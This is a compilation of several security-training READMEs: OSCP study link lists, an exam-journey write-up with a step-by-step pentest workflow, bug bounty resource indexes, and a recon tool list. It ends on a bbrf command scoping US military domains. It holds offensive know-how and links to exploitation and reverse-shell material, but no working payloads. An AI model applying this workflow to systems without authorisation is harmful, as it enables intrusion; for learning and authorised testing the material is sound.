attempt](https://www.reddit.com/r/oscp/comments/l90f1q/preparing_for_4th_attempt/) - [Second Attempt Failure](https://www.reddit.com/r/oscp/comments/la0xzk/second_attempt_failure/) - [Access to machines for report writing?](https://www.reddit.com/r/oscp/comments/lbntjv/access_to_machines_for_report_writing/) - [OSCP Practical Advice for Success](https://www.reddit.com/r/oscp/comments/m29gx4/oscp_practical_advice_for_success/) - [Failed this morning, a feels dump](https://www.reddit.com/r/oscp/comments/m9bsxf/failed_this_morning_a_feels_dump/?utm_source=amp&utm_medium=&utm_content=tp_title) - [Proving Grounds Practice Review](https://www.reddit.com/r/oscp/comments/mceeqy/proving_grounds_practice_review/) ## GitHub repos - [Awesome OSCP](https://github.com/The-Lynx-Team/awesome-oscp) - [Enumeration wikis](https://github.com/theonlykernel/enumeration/wiki) - [PimpMyKali](https://github.com/Dewalt-arch/pimpmykali) - [ConPtyShell - Fully Interactive Revese Shell for Windows](https://github.com/antonioCoco/ConPtyShell) ## Webbing ### General - [Web vulnerabilities to gain access to the system](https://www.exploit-db.com/papers/13017) - [Basic Shellshock Exploitation](https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/) ### Playing with SQL - [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/) - [Full MSSQL Injection PWNage](https://www.exploit-db.com/papers/12975) - [MySQL Error Based SQL Injection Using EXP](https://www.exploit-db.com/docs/english/37953-mysql-error-based-sql-injection-using-exp.pdf) ### Microsoft IIS resources ##### Official documentation - [Understanding Sites, Applications, and Virtual Directories on IIS 7](https://docs.microsoft.com/en-us/iis/get-started/planning-your-iis-architecture/understanding-sites-applications-and-virtual-directories-on-iis) ##### Other interesting stuff - [Uploading web.config for Fun and Profit 2 by @irsdl](https://soroush.secproject.com/blog/2019/08/uploading-web-config-for-fun-and-profit-2/) - [IIS Application vs. Folder Detection During Blackbox Testing by @irsdl](https://soroush.secproject.com/blog/2019/07/iis-application-vs-folder-detection-during-blackbox-testing/) ## Genereal useful resources - [Explain shell](https://explainshell.com/) - [Powershell basics](https://www.darkoperator.com/powershellbasics) - [Pentest Tips and Tricks](https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/) - [Big list with tips, tricks and cheat sheets](https://guif.re/) - [How to PASS the OSCP Exam - You're probably not preparing like you should be!](https://www.youtube.com/watch?v=eLNYc-1ScdU) ## Buffer Overflow - [Do Stack Bufferoverflow Good](https://github.com/justinsteven/dostackbufferoverflowgood) - [OSCP Prep - x86 Windows Stack-Based Buffer Overflow Full Tutorial - War-FTP 1.65](https://www.youtube.com/watch?v=Z2pQuGmFNrM) ## Active Directory - [Attacking Active Directory: 0 to 0.9](https://zer1t0.gitlab.io/posts/attacking_ad/?s=09) - [Stealthbits Attack Catalog](https://attack.stealthbits.com/) - [Cheat Sheet - Attack Active Directory](https://github.com/drak3hft7/Cheat-Sheet---Active-Directory) - [Active Directory Kill Chain Attack & Defense](https://github.com/infosecn1nja/AD-Attack-Defense) - [Active Directory Exploitation Cheat Sheet](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet) - [Vulnerable-AD (Local lab)](https://github.com/WazeHell/vulnerable-AD) - [Active Directory Labs/exams Review](https://github.com/ryan412/ADLabsReview) **Extra** ## PrivEsc #### General - [PayloadAllTheThings - Linux Privilege Escalation methodology](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md) - [PayloadAllTheThings - Windows Privilege Escalation methodology](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) - [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) #### YouTube - [Conda's YouTube Privilege Escalation playlist](https://www.youtube.com/watch?v=VpNaPAh93vE&list=PLDrNMcTNhhYrBNZ_FdtMq-gLFQeUZFzWV) - [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) - [Privilege Escaltion FTW (Jake Williams)](https://www.youtube.com/watch?v=yXe4X-AIbps) - [Elevating your Windows Privileges Like a Boss! (Jake Williams)](https://www.youtube.com/watch?v=SHdM197sbIE) - [Weird PrivEsc Techinques](https://www.youtube.com/watch?v=wyeRPSjnNjY) - [Level Up! Practical Windows Privilege Escalation - Andrew Smith](https://www.youtube.com/watch?v=PC_iMqiuIRQ) #### Linux Capabilities - [Linux Privilege Escalation using Capabilities](https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/) - [Linux Capabilities](https://github.com/carlospolop/hacktricks/blob/master/linux-unix/privilege-escalation/linux-capabilities.md) - [Day 44: Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced](https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099) - [Privilege Escalation by abusing SYS\_PTRACE Linux Capability](https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc) ## Methodologies - [CTF Series : Vulnerable Machines](https://bitvijays.github.io/LFC-VulnerableMachines.html) - [Post Exploitation](https://n00bpentesting.wordpress.com/lessons/ptes-101/post-exploitation/) - [PayloadAllTheThings - Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Methodology%20and%20Resources) ## Automation scripts - [Incursore](https://github.com/wirzka/incursore) - [nmapAutomator](https://github.com/21y4d/nmapAutomator) - [Autorecon](https://github.com/Tib3rius/AutoRecon) - [Onetwopunch](https://github.com/superkojiman/onetwopunch) ## Tools - [Parser Nmap](https://github.com/shifty0g/ultimate-nmap-parser) - [SUDO KILLER](https://github.com/TH3xACE/SUDO_KILLER) - [mgeeky's Penetration Testing Tools](https://github.com/mgeeky/Penetration-Testing-Tools) - [A @TomNomNom Recon Tools Primer](https://danielmiessler.com/blog/a-tomnomnom-tools-primer/) ### Firefox extensions *Tip: You should create a dedicated [profile](https://support.mozilla.org/en-US/kb/profile-manager-create-remove-switch-firefox-profiles) for each browsing activity* - [Wappalyzer](https://addons.mozilla.org/it/firefox/addon/wappalyzer/) - [FoxtProxy](https://addons.mozilla.org/it/firefox/addon/foxyproxy-standard/) - [Cookie-Editor](https://addons.mozilla.org/it/firefox/addon/cookie-editor/) - [Penetration Testing Kit](https://addons.mozilla.org/it/firefox/addon/penetration-testing-kit/) ## Cheat sheets and Wordlists - [Reverse Shell Cheat Sheet](https://highon.coffee/blog/reverse-shell-cheat-sheet/) - [OSCP-Prep-cheatsheet](https://github.com/evets007/OSCP-Prep-cheatsheet) - [SecLists](https://github.com/danielmiessler/SecLists) - [MSSQL Practical Injection Cheat Sheet](https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/) - [c0deman's Cave MSSQL Injection Cheat Sheet](https://c0deman.wordpress.com/2013/06/25/mssql-injection-cheat-sheet/) ## Gamified Learning ### TryHackMe #### Back to basics - [How The Web Works](https://tryhackme.com/module/how-the-web-works) - [Linux Fundamentals](https://tryhackme.com/module/linux-fundamentals) - [Windows Fundamentals](https://tryhackme.com/module/hacking-windows-1) - [Networking Fundamentals](https://tryhackme.com/module/intro-to-networking) - [Web Hacking Fundamentals](https://tryhackme.com/module/web-hacking-1) - [Web Fundamentals](https://tryhackme.com/room/webfundamentals) #### PrivEsc - [Shells and Privilege Escalation](https://tryhackme.com/module/privilege-escalation-and-shells) - [Common Linux Privilege Escalation](https://tryhackme.com/room/commonlinuxprivesc) - [Tib3rius' Linux PrivEsc](https://tryhackme.com/room/linuxprivesc) - [Privilege Escalation OverlayFS](https://tryhackme.com/room/overlayfs) - [Tib3rius' Windows PrivEsc](https://tryhackme.com/room/windows10privesc) #### Intermediate stuff - [Offensive Pentesting](https://tryhackme.com/paths) - [SQL Injection Lab](https://tryhackme.com/room/sqlilab) - [SQHell](https://tryhackme.com/room/sqhell) #### Room OSCP-Like - [Skynet](https://tryhackme.com/room/skynet) - [Steelmountain](https://tryhackme.com/room/steelmountain) - [Alfred](https://tryhackme.com/room/alfred) #### Buffer Overflow - [Buffer Overflow](https://tryhackme.com/room/bufferoverflowprep) ### Offensive Security Proving Grounds - [OSCP-Like PG Practice boxes](https://twitter.com/tj_null/status/1380574306976026628) ### HackTheBox - [OSCP-Like HTB boxes](https://twitter.com/TJ_Null/status/1162419643283333120) ### VulnHub - [OSCP-Like VulnHub boxes](https://www.abatchy.com/2017/02/oscp-like-vulnhub-vms.html) ### Others from the web - [WebSecurity Academy by PortSwigger](https://portswigger.net/web-security) - [OverTheWire (Linux wargames)](https://overthewire.org/) - [UnderTheWire (Powershell wargames)](https://underthewire.tech/) ## Reporting - [Reporting * ptestmethod.readthedocs.io](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P5-Reporting.html) - [Offensive Security Exam Report Template in Markdown](https://github.com/noraj/OSCP-Exam-Report-Template-Markdown) - [OSCP Report Exam and Lab Templates](https://github.com/whoisflynn/OSCP-Exam-Report-Template) - [OSCP Report Exam Templates](https://github.com/drak3hft7/OSCP-Exam-Report-Template) ## Mental and Physical Health Ok, this is not about popping shells, cracking codes, and launching exploits. Your health is more important than knowing how to pop a shell. If you are under burnout, if you can’t concentrate, if you can’t free your minds and visualize your target, all the above stuff is useless. You should find a spot to read the below links and do your own research. The InfoSec community is an enormous family, you’ll always find someone ready to help you. - [Mental Health Hackers](https://www.mentalhealthhackers.org/) - [The Causes of and Solutions for Security Burnout](https://www.youtube.com/watch?v=aqzMEfVfEnk) - [Cybersecurity’s Dirty Little Secret and Talent Grenade: Burnout](https://www.youtube.com/watch?v=lsm21No9m4s) - [Mental health in Cyber Security](https://www.reddit.com/r/cybersecurity/comments/m1c12e/mental_health_in_cybersecurity/) - [What Separates the Good From the Bad: Mental Health and Cybersecurity](https://www.infosecurity-magazine.com/next-gen-infosec/separates-good-bad-mental-health/) - [Check whole Azeria's Self-Improvement section](https://azeria-labs.com/the-importance-of-deep-work-the-30-hour-method-for-learning-a-new-skill/) - [Why People Who Protect Others Need to be at Their Best; Tackling Mental Health in Cybersecurity](https://bricata.com/blog/mental-health-cybersecurity/) - [Mental Health for Hackers](https://www.rsaconference.com/library/webcast/66-mental-health) - [Mental Health for Hackers: Contents Under Pressure](https://www.tripwire.com/state-of-security/security-awareness/events/mental-health-hackers-under-pressure/) - [How to beat imposter syndrome to get into cybersecurity industry?](https://www.reddit.com/r/cybersecurity/comments/koh3bj/how_to_beat_imposter_syndrome_to_get_into/) - [Navigating Imposter Syndrome in the world of Information Security](https://medium.com/@west.a.dominique/navigating-imposter-syndrome-in-the-world-of-information-security-dc6ec10d9c0f) - [Staying Sane in Cybersecurity - Dealing with Burnout and Stress by Hakluke](https://www.youtube.com/watch?v=XARTT8P_698) - [r00tMI Night Talk - Burnout nella Cybersecurity: la minaccia che non ti aspetti - Italian talk about burnout](https://www.youtube.com/watch?v=tV0bGS4tPx8) - [Ask Chloé: Vacations Aren’t the Cure for Burnout](https://securityboulevard.com/2022/02/ask-chloe-vacations-arent-the-cure-for-burnout/)
<details> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> - Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. </details> * [Write-up factory](https://writeup.raw.pm/) - Seach engine to find write-ups \(TryHackMe, HackTheBox, etc.\) * [CTFtime Write-ups](https://ctftime.org/writeups) - Newest write-ups added to CTF events on CTFtime <details> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> - Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. </details>
# openshift-waf Sidecar container that provides a WAF for openshift routers cd docker-nikto && docker build -t nikto . && docker run --net=host nikto -host http://$(ifconfig en0 | awk '$1 == "inet" {print $2}'):8080 -useragent curl
# OSCP-Human-Guide **Edit** I'm currently moving all the OSCP stuff and other things to my "[pentest-book](https://six2dez.gitbook.io/pentest-book/)". This repository will not have more updates. Sorry for the inconvenience. **This page is the jouney with some tips, the real guide is [HERE](https://github.com/six2dez/OSCP-Human-Guide/blob/master/oscp_human_guide.md)** My own OSCP guide with some presents, my owncrafted [guide](https://github.com/six2dez/OSCP-Human-Guide/blob/master/oscp_human_guide.md) and my Cherrytree [template](https://github.com/six2dez/OSCP-Human-Guide/blob/master/final_cherrytree_template.ctd), enjoy and feel free to contribute :) Table of Contents ================= * [OSCP-Human-Guide](#oscp-human-guide) * [Intro - Before OSCP](#intro---before-oscp) * [Penetration Testing Book](#penetration-testing-book) * [HackTheBox (the easiest ones) and VulnHub](#hackthebox-the-easiest-ones-and-vulnhub) * [Course and Lab](#course-and-lab) * [Lab machines step-by-step](#lab-machines-step-by-step) * [Exam preparation (after labs)](#exam-preparation-after-labs) * [HackTheBox(VIP) and VulnHub (medium ones)](#hacktheboxvip-and-vulnhub-medium-ones) * [Exam mockups](#exam-mockups) * [First mockup:](#first-mockup) * [Second mockup](#second-mockup) * [Third mockup](#third-mockup) * [Fourth mockup](#fourth-mockup) * [Exam first try](#exam-first-try) * [Preparations](#preparations) * [Result](#result) * [1 extra lab month](#1-extra-lab-month) * [Exam second try](#exam-second-try) * [Preparations](#preparations-1) * [Result](#result-1) ## Intro - Before OSCP ### Penetration Testing Book It was an incredible help to me, I have it on the throne of pentesting basis, litte outdated: https://nostarch.com/pentesting, there is some info to get all the exercises with updated resources here: https://github.com/PollyP/Notes-on-Penetration-Testing-A-Hands-On-Guide-to-Hacking/blob/master/README.md ### HackTheBox (the easiest ones) and VulnHub ## Course and Lab Repeat this mantra: **Sleep, rest, calm down you will get it** ### Lab machines step-by-step This is a must: **Use only the VM provided for this course, not the Kali latest ISO** I did it with the PWK VM upgrading only MSF, Nmap, Nikto and the basics, but **not** upgrade the entire OS. 1. Open CherryTree template to take screenshots and paste outputs. 2. Run simple nmap and then the slower. 3. Check first results (webs, ssh, ftp) from the first fast nmap scan. 4. Review slower nmap scan. 5. Always go for the easiest port (SMB, FTP, HTTP...). 6. Depend on each port do the appropiate enumeration techniches. 7. Time to find exploits and try them. 1. In case webpage is your target, look the source code, ever, will find software versions, for example. 8. When you get the exploit and you have tweaked it for your target and purpose you should be inside as low user. 9. Simple enumeration such as OS version, users, permissions, files in home, compilers, available tools. - In case of Windows, with `systeminfo` is enough for me https://github.com/GDSSecurity/Windows-Exploit-Suggester 10. Find out how to upload files. 11. Upload your privilege escalation script. 1. In case of Linux I always used LinEnum and linux-exploit-suggester 2. Check services running and check the strange ones in [gtfobins](https://gtfobins.github.io/) or [lolbas](https://lolbas-project.github.io/#) and [exploit-db](https://www.exploit-db.com/) 12. Run your exploit and get root, collect proofs, passwords, review root paths and home paths for interesting files for other machines. ## Exam preparation (after labs) ### HackTheBox(VIP) and VulnHub (medium ones) ### Exam mockups I did 4 exam mockups in 2 weeks, yes, 24 hours for 5 machines. Main resource to choose machines: [NetSecFocus Trophy Room](https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8) #### First mockup: - Brainpan [VulnHub](https://www.vulnhub.com/entry/brainpan-1,51/) - Kioptrix2014 [VulnHub](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) - Lordoftheroot [VulnHub](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) - Pwnlab_init [VulnHub](https://www.vulnhub.com/entry/pwnlab-init,158/) - VulnOsv2 [VulnHub](https://www.vulnhub.com/entry/pwnlab-init,158/) #### Second mockup - Bastard [HTB](https://www.hackthebox.eu/home/machines/profile/7) - Blue [HTB](https://www.hackthebox.eu/home/machines/profile/51) - Conceal [HTB](https://www.hackthebox.eu/home/machines/profile/168) - Devel [HTB](https://www.hackthebox.eu/home/machines/profile/3) - Metasploitable3_windows [GitHub](https://github.com/rapid7/metasploitable3) - Silo [HTB](https://www.hackthebox.eu/home/machines/profile/131) #### Third mockup - LazySysadmin [VulnHub](https://www.vulnhub.com/entry/lazysysadmin-1,205/) - Metasploitable3_ubuntu [GitHub](https://github.com/rapid7/metasploitable3) - MrRobot [VulnHub](https://www.vulnhub.com/entry/mr-robot-1,151/) - Pinky's Palace v1 [VulnHub](https://www.vulnhub.com/entry/pinkys-palace-v1,225/) - Own crafted Windows XP machine with SLMail, Minishare, DoStackOverflowGood, VulnServer and WarFTPD. #### Fourth mockup - Active [HTB](https://www.hackthebox.eu/home/machines/profile/148) - Bounty [HTB](https://www.hackthebox.eu/home/machines/profile/142) - Brainpan [VulnHub](https://www.vulnhub.com/entry/brainpan-1,51/) - Cronos [HTB](https://www.hackthebox.eu/home/machines/profile/11) - DevOops [HTB](https://www.hackthebox.eu/home/machines/profile/140) ## Exam first try ### Preparations - Session recorded with OBStudio, two screens without sound at 10 fps in mkv format, about 25GB. ### Result Failed, 6 hours in the first BOF, all went bad due my extreme nervous :( ## 1 extra lab month After this last month this was my result: IT Network unlocked, 32 machines rooted in Public Network, that's all. No exam mockups. ## Exam second try ### Preparations - Session recorded with OBStudio, two screens without sound at 10 fps in mkv format, about 25GB. ### Result - After 8 hours 4 machines rooted. After 20 hours 5 machines rooted, with 5 slept. - [This](https://github.com/whoisflynn/OSCP-Exam-Report-Template) is the template used for my exam report. - Report done in 4 hours. ## Stargazers over time [![Stargazers over time](https://starchart.cc/six2dez/OSCP-Human-Guide.svg)](https://starchart.cc/six2dez/OSCP-Human-Guide)
# BUG BOUNTY (Under Development) Note: Contents inside the **RESETHACKER Community** are to help our community members and content belongs to respective Authors and RESETHACKER Team. BugBounty HelpDesk | Title -- | -- **0** Bug bounty FAQ | [Beginners friendly](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/bugbounty-FAQ.md) **0** ResetHacker- Setup HelpDesk | [Pentesting/Bug Bounty/DevSecOps Setups in window, linux, docker and vps(aws, azure,gcp etc)](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/setup) **0** Ignitetechnologies & ResetHacker | [Burp Suite for Pentester and cheatsheet to hunt the vulnerabilities](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/burpsuite.md) **0** Harsh-Bothra | [Learn 365 Challenge for Beginners/Intermidate - Take it as a refererance to Challenge yourself](https://github.com/harsh-bothra/learn365) **0** hakluke | [Bug-bounty-standards - A list of edge cases that occur in bug bounty programs, conversations on how they should be handled.](https://github.com/hakluke/bug-bounty-standards) **0** Cipher387 | [Dork Collection for different search engine:](https://github.com/cipher387/Dorks-collections-list) **0** Luke Stephens | [How to Regex: A Practical Guide to Regular Expressions (Regex) for Hackers](https://www.bugcrowd.com/blog/how-to-regex-a-practical-guide-to-regular-expressions-regex-for-hackers/) **0** Streaak | [Got an API use Keyhacks](https://github.com/streaak/keyhacks) **0** Vikram | [JavaScript - Content discovery](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/javascript.md) **0** Wordlists | [All Wordlists at one place](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/Wordlists/AllWordlists.md) **0** Bug bounty writeups | [Vulnerability based write ups at one place](https://github.com/alexbieber/Bug_Bounty_writeups) **0** Bug Bounty Mind-Map collection | [Bugbounty Mindmap curated by all the amazing bughunters.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/Bugbounty/BBMindmap) **0** Public Bug bounty | [Collection of public Bugbounty program](https://github.com/resethacker/public-bugbounty-programs) **0** StayUpToDate | [Latest reward, CVE, writeups, tools, Reports, Disclosures and on going trend in Community.](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) BugBounty HelpDesk | Title -- | -- **1** HackTricks | [Pentesting & bugbounty Methodology](https://book.hacktricks.xyz/pentesting-methodology) **2** Six2dez | [Web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist) **3** gowthams | [Help bug bounty hunters with resources](https://gowthams.gitbook.io/bughunter-handbook/bugbounty-short-write-ups) **4** The Web Application Security Consortium | [The WASC Threat Classification v2.0](http://projects.webappsec.org/w/page/13246978/Threat-Classification) **5** kathan19 | [HowToHunt](https://kathan19.gitbook.io/howtohunt/) **6** Ninad Mathpati | [Securityboat](https://workbook.securityboat.in/) **7** Book of Bug Bounty Tips | [Collection of "BugBounty" Tips tweeted / shared by community people.](https://gowsundar.gitbook.io/book-of-bugbounty-tips/) **8** EdOverflow | [Cheatsheets and Must checkout for subdomains Takeover](https://github.com/EdOverflow/bugbounty-cheatsheet) **9** Harsh-Bothra | [Security Explained - Highly recommend to understabd vulnerable code-** files](https://github.com/harsh-bothra/SecurityExplained/tree/main/resources) **10** Security protection | [Curated lists of tools, tips and resources for protecting digital security and privacy](https://security-list.js.org/#/) ## Getting started with BugBounty - Under development 1. | [Resources for getting started with BugBounty -BBb_00 ](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBbasics.md) 2. | [Resources for Web Pentesting: Let's Hunt - BBh_01 - under development ](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBintermediate.md) This contains the detailed resources for people getting started with BugBounty. Index | [BugBounty Basic -BBb_00 ](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBbasics.md) --- | --- **1** | Linux Distributions **2** | Basic Understanding the web application before you start Hunting **3** | Learning resources **4** | Paid Certifications / courses **5** | Bug Bounty platforms offers Bounty **6** | Practice platform **7** | [Talks - Bug Bounty] **8** | [Pentesting & Bug Hunting Resources - How to Start?] **9** | [Bug reports] **10** | [Vulnerabilt] Assesment and one liners] **11** | [Bug hunting Reconnaissance writeups] **12** | [Tools for bug bounty] **13** | [Ebooks] **14** | [Misc] This contains the detailed Resources for people **Already Doing BugBounty** Index | [Web pentesting : Let's Hunt - BBh_01 - Under development](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBintermediate.md) --- | --- **1** | [Pentesting Reports/Disclosures ] **2** | [Web Pentesting MindMaps] **3** | [Web security Testing Writeups] **4** | [Bugbounty Reports/Disclosures ] **5** | [Bugbounty Methodology/Reconnaissance]
<h1 align="center"> 👑 What is KingOfBugBounty Project </h1> Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. 👑 ## Stats King ![OFJAAAH](https://github-readme-stats.vercel.app/api?username=KingOfBugbounty&show_icons=true&theme=dracula) [![DigitalOcean Referral Badge](https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg)](https://www.digitalocean.com/?refcode=703ff752fd6f&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge) ## Join Us [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah) <div> <a href="https://www.linkedin.com/in/atjunior/"><img src="https://img.shields.io/badge/LinkedIn-0077B5?style=for-the-badge&logo=linkedin&logoColor=white"></img></a> <a href="https://www.youtube.com/c/OFJAAAH"><img src="https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white"></a> </div> ## BugBuntu Download - [BugBuntu](https://sourceforge.net/projects/bugbuntu/) - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) ## Special thanks - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) - [@Stokfredrik](https://twitter.com/stokfredrik) - [@Jhaddix](https://twitter.com/Jhaddix) - [@pdiscoveryio](https://twitter.com/pdiscoveryio) - [@TomNomNom](https://twitter.com/TomNomNom) - [@jeff_foley](https://twitter.com/@jeff_foley) - [@NahamSec](https://twitter.com/NahamSec) - [@j3ssiejjj](https://twitter.com/j3ssiejjj) - [@zseano](https://twitter.com/zseano) - [@pry0cc](https://twitter.com/pry0cc) - [@wellpunk](https://twitter.com/wellpunk) ## Scripts that need to be installed To run the project, you will need to install the following programs: - [Amass](https://github.com/OWASP/Amass) - [Anew](https://github.com/tomnomnom/anew) - [Anti-burl](https://github.com/tomnomnom/hacks/tree/master/anti-burl) - [Assetfinder](https://github.com/tomnomnom/assetfinder) - [Airixss](https://github.com/ferreiraklet/airixss) - [Axiom](https://github.com/pry0cc/axiom) - [Bhedak](https://github.com/R0X4R/bhedak) - [CF-check](https://github.com/dwisiswant0/cf-check) - [Chaos](https://github.com/projectdiscovery/chaos-client) - [Cariddi](https://github.com/edoardottt/cariddi) - [Dalfox](https://github.com/hahwul/dalfox) - [DNSgen](https://github.com/ProjectAnte/dnsgen) - [Filter-resolved](https://github.com/tomnomnom/hacks/tree/master/filter-resolved) - [Findomain](https://github.com/Edu4rdSHL/findomain) - [Fuff](https://github.com/ffuf/ffuf) - [Freq](https://github.com/takshal/freq) - [Gargs](https://github.com/brentp/gargs) - [Gau](https://github.com/lc/gau) - [Gf](https://github.com/tomnomnom/gf) - [Github-Search](https://github.com/gwen001/github-search) - [Gospider](https://github.com/jaeles-project/gospider) - [Gowitness](https://github.com/sensepost/gowitness) - [Goop](https://github.com/deletescape/goop) - [GetJS](https://github.com/003random/getJS) - [Hakrawler](https://github.com/hakluke/hakrawler) - [HakrevDNS](https://github.com/hakluke/hakrevdns) - [Haktldextract](https://github.com/hakluke/haktldextract) - [Haklistgen](https://github.com/hakluke/haklistgen) - [Html-tool](https://github.com/tomnomnom/hacks/tree/master/html-tool) - [Httpx](https://github.com/projectdiscovery/httpx) - [Jaeles](https://github.com/jaeles-project/jaeles) - [Jsubfinder](https://github.com/ThreatUnkown/jsubfinder) - [Kxss](https://github.com/Emoe/kxss) - [LinkFinder](https://github.com/GerbenJavado/LinkFinder) - [log4j-scan](https://github.com/fullhunt/log4j-scan) - [Metabigor](https://github.com/j3ssie/metabigor) - [MassDNS](https://github.com/blechschmidt/massdns) - [Naabu](https://github.com/projectdiscovery/naabu) - [Notify](https://github.com/projectdiscovery/notify) - [Qsreplace](https://github.com/tomnomnom/qsreplace) - [Rush](https://github.com/shenwei356/rush) - [SecretFinder](https://github.com/m4ll0k/SecretFinder) - [Shodan](https://help.shodan.io/command-line-interface/0-installation) - [ShuffleDNS](https://github.com/projectdiscovery/shuffledns) - [SQLMap](https://github.com/sqlmapproject/sqlmap) - [Subfinder](https://github.com/projectdiscovery/subfinder) - [SubJS](https://github.com/lc/subjs) - [Unew](https://github.com/dwisiswant0/unew) - [Unfurl](https://github.com/tomnomnom/unfurl) - [WaybackURLs](https://github.com/tomnomnom/waybackurls) - [Wingman](https://xsswingman.com/#faq) - [Goop](https://github.com/deletescape/goop) - [Tojson](https://github.com/tomnomnom/hacks/tree/master/tojson) - [X8](https://github.com/Sh1Yo/x8) - [XSStrike](https://github.com/s0md3v/XSStrike) - [Page-fetch](https://github.com/detectify/page-fetch) ### BBRF SCOPE DoD ```bash bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' ``` ### 